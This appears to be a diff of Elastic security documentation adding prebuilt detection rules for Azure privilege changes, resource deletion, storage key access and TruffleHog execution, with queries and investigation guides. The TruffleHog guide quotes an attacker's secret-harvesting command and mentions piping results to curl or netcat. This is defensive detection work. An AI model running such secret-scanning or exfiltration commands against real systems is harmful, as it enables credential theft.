compromising other accounts, servers, or services. + - Identify any regulatory or legal ramifications related to this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions. +- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users. +- Restore the PIM roles to the desired state. +- Consider enabling multi-factor authentication for users. +- Follow security best practices https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices[outlined] by Microsoft. +- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Update role setting in PIM" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-rbac-built-in-administrator-roles-assigned.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-rbac-built-in-administrator-roles-assigned.asciidoc new file mode 100644 index 0000000000..1fec524a8a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-rbac-built-in-administrator-roles-assigned.asciidoc @@ -0,0 +1,138 @@ +[[prebuilt-rule-8-19-8-azure-rbac-built-in-administrator-roles-assigned]] +=== Azure RBAC Built-In Administrator Roles Assigned + +Identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-azure.activitylogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles +* https://orca.security/resources/research-pod/azure-identity-access-management-iam-active-directory-ad/ +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Azure Activity Logs +* Use Case: Identity and Access Audit +* Tactic: Privilege Escalation +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating Azure RBAC Built-In Administrator Roles Assigned* + + +This rule identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. Assignment can be done via the Azure portal, Azure CLI, PowerShell, or through API calls. Monitoring these assignments helps detect potential unauthorized privilege escalations. + + +*Privileged Built-In Administrator Roles* + +- Contributor: b24988ac-6180-42a0-ab88-20f7382dd24c +- Owner: 8e3af657-a8ff-443c-a75c-2fe8c4bcb635 +- Azure File Sync Administrator: 92b92042-07d9-4307-87f7-36a593fc5850 +- Reservations Administrator: a8889054-8d42-49c9-bc1c-52486c10e7cd +- Role Based Access Control Administrator: f58310d9-a9f6-439a-9e8d-f62e7b41a168 +- User Access Administrator: 18d7d88d-d35e-4fb5-a5c3-7773c20a72d9 + + +*Possible investigation steps* + + +- Identify the user who assigned the role and examine their recent activity for any suspicious actions. +- Review the source IP address and location associated with the role assignment event to assess if it aligns with expected user behavior or if it indicates potential unauthorized access. +- Check the history of role assignments for the user who was assigned the role to determine if this is a recurring pattern or a one-time event. + - Additionally, identify the lifetime of the targeted user account to determine if it is a newly created account or an existing one. +- Determine if the user assigning the role historically has the necessary permissions to assign such roles and has done so in the past. +- Investigate any recent changes or activities performed by the newly assigned administrator to identify any suspicious actions or configurations that may have been altered. +- Correlate with other logs, such as Microsoft Entra ID sign-in logs, to identify any unusual access patterns or behaviors for the user. + + +*False positive analysis* + + +- Legitimate administrators may assign built-in administrator roles during routine operations, maintenance or as required for onboarding new staff. +- Review internal tickets, change logs, or admin activity dashboards for approved operations. + + +*Response and remediation* + + +- If administrative assignment was not authorized: + - Immediately remove the built-in administrator role from the account. + - Disable or lock the account and begin credential rotation. + - Audit activity performed by the account after elevation, especially changes to role assignments and resource access. +- If suspicious: + - Notify the user and confirm whether they performed the action. + - Check for any automation or scripts that could be exploiting unused elevated access paths. + - Review conditional access and PIM (Privileged Identity Management) configurations to limit elevation without approval. +- Strengthen posture: + - Require MFA and approval for all privilege escalation actions. + - Consider enabling JIT (Just-in-Time) access with expiration. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: azure.activitylogs and + event.action: "MICROSOFT.AUTHORIZATION/ROLEASSIGNMENTS/WRITE" and + azure.activitylogs.properties.requestbody.properties.roleDefinitionId: + ( + *18d7d88d-d35e-4fb5-a5c3-7773c20a72d9* or + *f58310d9-a9f6-439a-9e8d-f62e7b41a168* or + *b24988ac-6180-42a0-ab88-20f7382dd24c* or + *8e3af657-a8ff-443c-a75c-2fe8c4bcb635* or + *92b92042-07d9-4307-87f7-36a593fc5850* or + *a8889054-8d42-49c9-bc1c-52486c10e7cd* + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-resource-group-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-resource-group-deletion.asciidoc new file mode 100644 index 0000000000..1adaf7d5e0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-resource-group-deletion.asciidoc @@ -0,0 +1,128 @@ +[[prebuilt-rule-8-19-8-azure-resource-group-deletion]] +=== Azure Resource Group Deletion + +Identifies the deletion of a resource group in Azure, which includes all resources within the group. Deletion is permanent and irreversible. An adversary may delete a resource group in an attempt to evade defenses or intentionally destroy data. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-portal + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Log Auditing +* Tactic: Impact +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Resource Group Deletion* + + +Azure Resource Groups are containers that hold related resources for an Azure solution, enabling efficient management and organization. Adversaries may exploit this by deleting entire groups to disrupt services or erase data, causing significant impact. The detection rule monitors Azure activity logs for successful deletion operations, flagging potential malicious actions for further investigation. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the deletion event by checking for the operation name "MICROSOFT.RESOURCES/SUBSCRIPTIONS/RESOURCEGROUPS/DELETE" and ensure the event outcome is marked as "Success" or "success". +- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs. +- Check the timestamp of the deletion event to determine when the resource group was deleted and correlate this with any other suspicious activities around the same time. +- Investigate the resources contained within the deleted resource group to assess the potential impact, including any critical services or data that may have been affected. +- Review any recent changes in permissions or roles assigned to the user or service principal involved in the deletion to identify potential privilege escalation or misuse. +- Examine any related alerts or logs for unusual activities or patterns that might indicate a broader attack or compromise within the Azure environment. + + +*False positive analysis* + + +- Routine maintenance activities by IT teams may trigger alerts when resource groups are intentionally deleted as part of regular updates or infrastructure changes. To manage this, create exceptions for known maintenance windows or specific user accounts responsible for these tasks. +- Automated scripts or deployment tools that manage resource lifecycles might delete resource groups as part of their normal operation. Identify these scripts and exclude their activity from alerts by filtering based on the service principal or automation account used. +- Testing environments often involve frequent creation and deletion of resource groups. Exclude these environments from alerts by tagging them appropriately and configuring the detection rule to ignore actions on tagged resources. +- Mergers or organizational restructuring can lead to legitimate resource group deletions. Coordinate with relevant departments to anticipate these changes and temporarily adjust monitoring rules to prevent false positives. +- Ensure that any third-party services or consultants with access to your Azure environment are accounted for, as their activities might include resource group deletions. Establish clear communication channels to verify their actions and adjust monitoring rules accordingly. + + +*Response and remediation* + + +- Immediately isolate the affected Azure subscription to prevent further unauthorized actions. This can be done by temporarily disabling access or applying strict access controls. +- Review and revoke any suspicious or unauthorized access permissions associated with the affected resource group to prevent further exploitation. +- Restore the deleted resources from backups if available. Ensure that backup and recovery processes are validated and functioning correctly. +- Conduct a thorough audit of recent Azure activity logs to identify any other potentially malicious actions or compromised accounts. +- Escalate the incident to the security operations team for a detailed investigation and to determine if there are broader implications or related threats. +- Implement additional monitoring and alerting for similar deletion activities across all Azure subscriptions to enhance early detection of such threats. +- Review and strengthen access management policies, ensuring that only authorized personnel have the necessary permissions to delete resource groups. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.RESOURCES/SUBSCRIPTIONS/RESOURCEGROUPS/DELETE" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-blob-public-access-enabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-blob-public-access-enabled.asciidoc new file mode 100644 index 0000000000..3a2d3a1aa4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-blob-public-access-enabled.asciidoc @@ -0,0 +1,115 @@ +[[prebuilt-rule-8-19-8-azure-storage-account-blob-public-access-enabled]] +=== Azure Storage Account Blob Public Access Enabled + +Identifies when Azure Storage Account Blob public access is enabled, allowing external access to blob containers. This technique was observed in cloud ransom-based campaigns where threat actors modified storage accounts to expose non-remotely accessible accounts to the internet for data exfiltration. Adversaries abuse the Microsoft.Storage/storageAccounts/write operation to modify public access settings. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.activitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ +* https://docs.microsoft.com/en-us/azure/storage/blobs/anonymous-read-access-configure + +*Tags*: + +* Domain: Cloud +* Domain: Storage +* Data Source: Azure +* Data Source: Azure Activity Logs +* Use Case: Threat Detection +* Tactic: Collection +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Azure Storage Account Blob Public Access Enabled* + + +Azure Storage Accounts provide cloud storage solutions with various access control mechanisms. The public access setting, when enabled, allows anonymous internet access to blob containers, bypassing authentication requirements. Adversaries exploit this feature to expose sensitive data for exfiltration or to establish persistent external access. This detection monitors for successful modifications that enable public blob access, a technique notably used in STORM-0501 cloud ransom-based campaigns. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the user or service principal that initiated the storage account modification by examining the principal ID, UPN and user agent fields. +- Check the specific storage account name in `azure.resource.name` to understand which storage resources were affected and assess the sensitivity of data stored there. +- Investigate the timing of the event to correlate with any other suspicious activities, such as unusual login patterns or privilege escalation attempts. +- Examine the request or response body details to understand the full scope of changes made to the storage account configuration beyond public access settings. +- Review access logs for the affected storage account to identify any subsequent data access or exfiltration attempts following the public access enablement. +- Verify if the storage account modification aligns with approved change requests or maintenance windows in your organization. +- Check for other storage accounts modified by the same principal to identify potential lateral movement or widespread configuration changes. +- Pivot into related activity for the storage account and/or container such as data deletion, encryption or further permission changes. + + +*False positive analysis* + + +- Legitimate CDN integration or public website hosting may require enabling public blob access. Document approved storage accounts used for public content delivery and create exceptions for these specific resources. +- DevOps automation tools might temporarily enable public access during deployment processes. Identify service principals used by CI/CD pipelines and consider time-based exceptions during deployment windows. +- Testing and development environments may have different access requirements. Consider filtering out non-production storage accounts if public access is acceptable in those environments. +- Migration activities might require temporary public access. Coordinate with infrastructure teams to understand planned migrations and create temporary exceptions with defined expiration dates. + + +*Response and remediation* + + +- Immediately disable public blob access on the affected storage account using Azure Portal IaC, or Azure CLI command. +- Audit all blob containers within the affected storage account to identify which data may have been exposed and assess the potential impact of the exposure. +- Review Azure Activity Logs and storage access logs to determine if any data was accessed or exfiltrated while public access was enabled. +- Rotate any credentials, keys, or sensitive data that may have been stored in the exposed blob containers. +- If unauthorized modification is confirmed, disable the compromised user account or service principal and investigate how the credentials were obtained. +- Implement Azure Policy to prevent enabling public blob access on storage accounts containing sensitive data, using built-in policy definitions for storage account public access restrictions. +- Consider implementing private endpoints for storage accounts that should never be publicly accessible, ensuring network-level isolation. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.activitylogs" and +event.action: "MICROSOFT.STORAGE/STORAGEACCOUNTS/WRITE" and +event.outcome: "success" and +azure.activitylogs.properties.responseBody: *\"allowBlobPublicAccess\"\:true* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Cloud Storage +** ID: T1530 +** Reference URL: https://attack.mitre.org/techniques/T1530/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-key-regenerated.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-key-regenerated.asciidoc new file mode 100644 index 0000000000..4cfef4bf22 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-key-regenerated.asciidoc @@ -0,0 +1,131 @@ +[[prebuilt-rule-8-19-8-azure-storage-account-key-regenerated]] +=== Azure Storage Account Key Regenerated + +Identifies a rotation to storage account access keys in Azure. Regenerating access keys can affect any applications or Azure services that are dependent on the storage account key. Adversaries may regenerate a key as a means of acquiring credentials to access systems and resources. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Storage Account Key Regenerated* + + +Azure Storage Account keys are critical credentials that grant access to storage resources. They are often used by applications and services to authenticate and interact with Azure Storage. Adversaries may regenerate these keys to gain unauthorized access, potentially disrupting services or exfiltrating data. The detection rule monitors for key regeneration events, flagging successful operations as potential indicators of credential misuse, thus enabling timely investigation and response. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the specific storage account associated with the key regeneration event by examining the operation_name field for "MICROSOFT.STORAGE/STORAGEACCOUNTS/REGENERATEKEY/ACTION". +- Check the event.outcome field to confirm the success of the key regeneration and gather details about the user or service principal that initiated the action. +- Investigate the user or service principal's recent activities in Azure to determine if there are any other suspicious actions or patterns that could indicate unauthorized access or misuse. +- Assess the impact on applications and services that rely on the affected storage account key by identifying dependencies and checking for any service disruptions or anomalies. +- Review access policies and permissions for the storage account to ensure they are appropriately configured and consider implementing additional security measures, such as Azure Key Vault, to manage and rotate keys securely. + + +*False positive analysis* + + +- Routine key rotation by administrators or automated scripts can trigger alerts. To manage this, identify and document regular key rotation schedules and exclude these events from alerts. +- Development and testing environments often regenerate keys frequently. Exclude these environments from alerts by filtering based on environment tags or resource names. +- Third-party integrations or services that require periodic key regeneration might cause false positives. Work with service owners to understand these patterns and create exceptions for known, legitimate services. +- Azure policies or compliance checks that enforce key rotation can also lead to false positives. Coordinate with compliance teams to align detection rules with policy schedules and exclude these events. +- Ensure that any automated processes that regenerate keys are logged and documented. Use this documentation to create exceptions for these processes in the detection rule. + + +*Response and remediation* + + +- Immediately revoke the regenerated storage account keys to prevent unauthorized access. This can be done through the Azure portal or using Azure CLI commands. +- Identify and update all applications and services that rely on the compromised storage account keys with new, secure keys to restore functionality and prevent service disruption. +- Conduct a thorough review of access logs and audit trails to identify any unauthorized access or data exfiltration attempts that may have occurred using the regenerated keys. +- Escalate the incident to the security operations team for further investigation and to determine if additional systems or accounts have been compromised. +- Implement conditional access policies and multi-factor authentication (MFA) for accessing Azure resources to enhance security and prevent similar incidents. +- Review and update the storage account's access policies and permissions to ensure that only authorized users and applications have the necessary access. +- Enhance monitoring and alerting mechanisms to detect future unauthorized key regeneration attempts promptly, ensuring timely response to potential threats. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.STORAGE/STORAGEACCOUNTS/REGENERATEKEY/ACTION" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Cloud Instance Metadata API +** ID: T1552.005 +** Reference URL: https://attack.mitre.org/techniques/T1552/005/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Credentials +** ID: T1098.001 +** Reference URL: https://attack.mitre.org/techniques/T1098/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-keys-accessed-by-privileged-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-keys-accessed-by-privileged-user.asciidoc new file mode 100644 index 0000000000..c820a134ca --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-keys-accessed-by-privileged-user.asciidoc @@ -0,0 +1,139 @@ +[[prebuilt-rule-8-19-8-azure-storage-account-keys-accessed-by-privileged-user]] +=== Azure Storage Account Keys Accessed by Privileged User + +Identifies unusual high-privileged access to Azure Storage Account keys by users with Owner, Contributor, or Storage Account Contributor roles. This technique was observed in STORM-0501 ransomware campaigns where compromised identities with high-privilege Azure RBAC roles retrieved access keys to perform unauthorized operations on Storage Accounts. Microsoft recommends using Shared Access Signature (SAS) models instead of direct key access for improved security. This rule detects when a user principal with high-privilege roles accesses storage keys for the first time in 7 days. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.activitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ +* https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Use Case: Threat Detection +* Data Source: Azure +* Data Source: Azure Activity Logs +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating Azure Storage Account Keys Accessed by Privileged User* + + +Azure Storage Account keys provide full administrative access to storage resources. While legitimate administrators may occasionally need to access these keys, Microsoft recommends using more granular access methods like Shared Access Signatures (SAS) or Azure AD authentication. This detection identifies when users with high-privilege roles (Owner, Contributor, Storage Account Contributor, or User Access Administrator) access storage account keys, particularly focusing on unusual patterns that may indicate compromise. This technique was notably observed in STORM-0501 ransomware campaigns where compromised identities retrieved keys for unauthorized storage operations. + + +*Possible investigation steps* + + +- Review the `azure.activitylogs.identity.authorization.evidence.principal_id` to identify the specific user who accessed the storage account keys. +- Examine the `azure.resource.name` field to determine which storage account's keys were accessed and assess the sensitivity of data stored there. +- Check the `azure.activitylogs.identity.authorization.evidence.role` to confirm the user's assigned role and whether this level of access is justified for their job function. +- Investigate the timing and frequency of the key access event - multiple key retrievals in a short timeframe may indicate automated exfiltration attempts. +- Review the source IP address and geographic location of the access request to identify any anomalous access patterns or locations. +- Correlate this event with other activities by the same principal ID, looking for patterns such as permission escalations, unusual data access, or configuration changes. +- Check Azure AD sign-in logs for the user around the same timeframe to identify any suspicious authentication events or MFA bypasses. +- Examine subsequent storage account activities to determine if the retrieved keys were used for data access, modification, or exfiltration. + + +*False positive analysis* + + +- DevOps and infrastructure teams may legitimately access storage keys during deployment or migration activities. Document these planned activities and consider creating exceptions for specific time windows. +- Emergency troubleshooting scenarios may require administrators to retrieve storage keys. Establish a process for documenting these emergency accesses and review them regularly. +- Automated backup or disaster recovery systems might use high-privilege service accounts that occasionally need key access. Consider using managed identities or service principals with more restricted permissions instead. +- Legacy applications that haven't been migrated to use SAS tokens or Azure AD authentication may still require key-based access. Plan to modernize these applications and track them as exceptions in the meantime. +- New storage account provisioning by administrators will often include initial key retrieval. Consider the age of the storage account when evaluating the risk level. + + +*Response and remediation* + + +- Immediately rotate the storage account keys that were accessed using Azure Portal or Azure CLI. +- Review all recent activities on the affected storage account to identify any unauthorized data access, modification, or exfiltration attempts. +- If unauthorized access is confirmed, disable the compromised user account and initiate password reset procedures. +- Audit all storage accounts accessible by the compromised identity and rotate keys for any accounts that may have been accessed. +- Implement Entra ID authentication or SAS tokens for applications currently using storage account keys to reduce future risk. +- Configure Azure Policy to restrict the listKeys operation to specific roles or require additional approval workflows. +- Review and potentially restrict the assignment of high-privilege roles like Owner and Contributor, following the principle of least privilege. +- Enable diagnostic logging for all storage accounts to maintain detailed audit trails of access and operations. +- Consider implementing Privileged Identity Management (PIM) for just-in-time access to high-privilege roles that can list storage keys. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.activitylogs" and +azure.activitylogs.operation_name: "MICROSOFT.STORAGE/STORAGEACCOUNTS/LISTKEYS/ACTION" and +azure.activitylogs.identity.authorization.evidence.principal_type: "User" and +azure.activitylogs.identity.authorization.evidence.role: ( + "Owner" or + "Contributor" or + "Storage Account Contributor" or + "User Access Administrator" +) and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ +* Sub-technique: +** Name: Cloud Secrets Management Stores +** ID: T1555.006 +** Reference URL: https://attack.mitre.org/techniques/T1555/006/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-credential-access-via-trufflehog-execution.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-credential-access-via-trufflehog-execution.asciidoc new file mode 100644 index 0000000000..bfe4f8b0c0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-credential-access-via-trufflehog-execution.asciidoc @@ -0,0 +1,114 @@ +[[prebuilt-rule-8-19-8-credential-access-via-trufflehog-execution]] +=== Credential Access via TruffleHog Execution + +This rule detects the execution of TruffleHog, a tool used to search for high-entropy strings and secrets in code repositories, which may indicate an attempt to access credentials. This tool was abused by the Shai-Hulud worm to search for credentials in code repositories. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: Windows +* OS: macOS +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Credential Access via TruffleHog Execution* + + +This rule flags TruffleHog executed to scan the local filesystem with verified JSON results, a direct path to harvesting secrets from source code, configs, and build artifacts. Attackers gain shell access on a developer workstation or CI runner, clone or point to internal repositories, run 'trufflehog --results=verified --json filesystem .' to enumerate valid tokens, and then pivot using the recovered keys to pull private code or authenticate to cloud and CI/CD systems. + + +*Possible investigation steps* + + +- Review binary path, code signature/hash, parent process chain, initiating user, and host role (developer workstation vs CI runner) to quickly decide if the execution matches an approved secret-scanning job or an ad‑hoc run. +- Determine the working directory and target path used by the scan to identify which repositories or configuration directories were inspected and whether sensitive files (e.g., .env, deployment keys, build secrets) were in scope. +- Pivot to same-session activity to spot credential use or exfiltration by correlating subsequent outbound connections to git remotes or cloud/CI APIs and launches of developer CLIs like git, gh, aws, az, gcloud, docker, kubectl, or vault. +- Look for output artifacts and exfil channels by checking for creation or deletion of JSON reports or archives, clipboard access, or piping of results to curl/wget/netcat and whether those artifacts were emailed or uploaded externally. +- Cross-check VCS and CI/CD audit logs for this identity and host for unusual pushes, pipeline changes, or new tokens issued shortly after the scan, which may indicate worm-like propagation or credential abuse. + + +*False positive analysis* + + +- An approved secret-scanning task by a developer or security engineer runs trufflehog with --results=verified --json filesystem to audit local code and configuration, producing benign activity on a development host. +- An internal automation or scheduled job invokes trufflehog to baseline filesystem secrets for compliance or hygiene checks, leading to expected process-start logs without credential abuse. + + +*Response and remediation* + + +- Immediately isolate the host or CI runner, terminate the trufflehog process and its parent shell/script, and block egress to git remotes and cloud APIs from that asset. +- Collect the verified findings from trufflehog output (stdout or JSON file), revoke and rotate any listed secrets (GitHub personal access tokens, AWS access keys, Azure service principal credentials, CI job tokens), and clear credential caches on the host. +- Remove unauthorized trufflehog binaries/packages, helper scripts, and scheduled tasks; delete report files and scanned working directories (local repo clones, .env/config folders), and purge shell history containing exfil 